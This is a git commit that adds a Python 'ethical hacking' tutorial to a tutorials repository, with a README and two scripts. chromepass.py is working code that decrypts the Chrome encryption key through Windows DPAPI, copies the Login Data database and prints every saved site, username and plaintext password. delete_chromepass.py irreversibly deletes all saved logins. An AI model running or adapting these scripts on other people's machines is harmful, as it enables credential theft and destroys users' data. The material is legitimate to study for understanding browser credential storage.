add extracting chrome passwords tutorial

Author: x4nth055

README.md

@@ -29,6 +29,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Crack Zip File Passwords in Python](https://www.thepythoncode.com/article/crack-zip-file-password-in-python). ([code](ethical-hacking/zipfile-cracker))
     - [How to Crack PDF Files in Python](https://www.thepythoncode.com/article/crack-pdf-file-password-in-python). ([code](ethical-hacking/pdf-cracker))
     - [How to Build a SQL Injection Scanner in Python](https://www.thepythoncode.com/code/sql-injection-vulnerability-detector-in-python). ([code](ethical-hacking/sql-injection-detector))
+    - [How to Extract Chrome Passwords in Python](https://www.thepythoncode.com/article/extract-chrome-passwords-python). ([code](ethical-hacking/chrome-password-extractor))
 
 - ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
     - ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)

ethical-hacking/chrome-password-extractor/README.md

@@ -0,0 +1,11 @@
+# [How to Extract Chrome Passwords in Python](https://www.thepythoncode.com/article/extract-chrome-passwords-python)
+To run this:
+- `pip3 install -r requirements.txt`
+- To extract Chrome passwords on Windows, run:
+    ```
+    python chromepass.py
+    ```
+- To delete saved passwords on Chrome:
+    ```
+    python delete_chromepass.py
+    ```

ethical-hacking/chrome-password-extractor/chromepass.py

@@ -0,0 +1,96 @@
+import os
+import json
+import base64
+import sqlite3
+import win32crypt
+from Crypto.Cipher import AES
+import shutil
+from datetime import timezone, datetime, timedelta
+
+def get_chrome_datetime(chromedate):
+    """Return a `datetime.datetime` object from a chrome format datetime
+    Since `chromedate` is formatted as the number of microseconds since January, 1601"""
+    return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
+
+def get_encryption_key():
+    local_state_path = os.path.join(os.environ["USERPROFILE"],
+                                    "AppData", "Local", "Google", "Chrome",
+                                    "User Data", "Local State")
+    with open(local_state_path, "r", encoding="utf-8") as f:
+        local_state = f.read()
+        local_state = json.loads(local_state)
+
+    # decode the encryption key from Base64
+    key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
+    # remove DPAPI str
+    key = key[5:]
+    # return decrypted key that was originally encrypted
+    # using a session key derived from current user's logon credentials
+    # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html
+    return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
+
+
+def decrypt_password(password, key):
+    try:
+        # get the initialization vector
+        iv = password[3:15]
+        password = password[15:]
+        # generate cipher
+        cipher = AES.new(key, AES.MODE_GCM, iv)
+        # decrypt password
+        return cipher.decrypt(password)[:-16].decode()
+    except:
+        try:
+            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
+        except:
+            # not supported
+            return ""
+
+
+def main():
+    # get the AES key
+    key = get_encryption_key()
+    # local sqlite Chrome database path
+    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
+                            "Google", "Chrome", "User Data", "default", "Login Data")
+    # copy the file to another location
+    # as the database will be locked if chrome is currently running
+    filename = "ChromeData.db"
+    shutil.copyfile(db_path, filename)
+    # connect to the database
+    db = sqlite3.connect(filename)
+    cursor = db.cursor()
+    # `logins` table has the data we need
+    cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
+    # iterate over all rows
+    for row in cursor.fetchall():
+        origin_url = row[0]
+        action_url = row[1]
+        username = row[2]
+        password = decrypt_password(row[3], key)
+        date_created = row[4]
+        date_last_used = row[5]        
+        if username or password:
+            print(f"Origin URL: {origin_url}")
+            print(f"Action URL: {action_url}")
+            print(f"Username: {username}")
+            print(f"Password: {password}")
+        else:
+            continue
+        if date_created != 86400000000 and date_created:
+            print(f"Creation date: {str(get_chrome_datetime(date_created))}")
+        if date_last_used != 86400000000 and date_last_used:
+            print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
+        print("="*50)
+
+    cursor.close()
+    db.close()
+    try:
+        # try to remove the copied db file
+        os.remove(filename)
+    except:
+        pass
+
+
+if __name__ == "__main__":
+    main()

ethical-hacking/chrome-password-extractor/delete_chromepass.py

@@ -0,0 +1,14 @@
+import sqlite3
+import os
+
+db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
+                            "Google", "Chrome", "User Data", "default", "Login Data")
+
+db = sqlite3.connect(db_path)
+cursor = db.cursor()
+# `logins` table has the data we need
+cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
+n_logins = len(cursor.fetchall())
+print(f"Deleting a total of {n_logins} logins...")
+cursor.execute("delete from logins")
+cursor.connection.commit()

ethical-hacking/chrome-password-extractor/requirements.txt

@@ -0,0 +1,2 @@
+pypiwin32
+pycryptodome